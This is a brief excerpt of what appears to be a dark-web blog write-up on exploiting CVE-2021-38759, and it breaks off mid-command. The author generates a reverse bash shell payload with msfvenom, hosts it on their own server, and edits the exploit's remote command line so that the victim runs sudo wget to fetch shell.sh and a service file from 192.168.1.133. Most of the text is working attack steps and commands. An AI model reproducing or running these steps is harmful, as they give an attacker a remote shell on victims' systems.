http://twd6bfktlkhwluhj2ghjthx55pnp2dcuuhf6qqjz7vm2krsmwpz6crad.onion/i-tried-to-squiz-the-best-from-the-most-bizzar-cve-i-ever-seen-cve-2021-38759-by-leox-jan-2023/index.html
Ok, firstly I created payload ( cmd/unix/reverse_bash ) with the name shell.sh , which I I added on my server where is waiting for victim to download it. msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh Then I modified this bizarre CVE code in the line where command execution command is happening. i,o,e=c.exec_command("sudo wget 192.168.1.133/shell.sh && sudo wget 192.168.1.133/shell.service && sudo...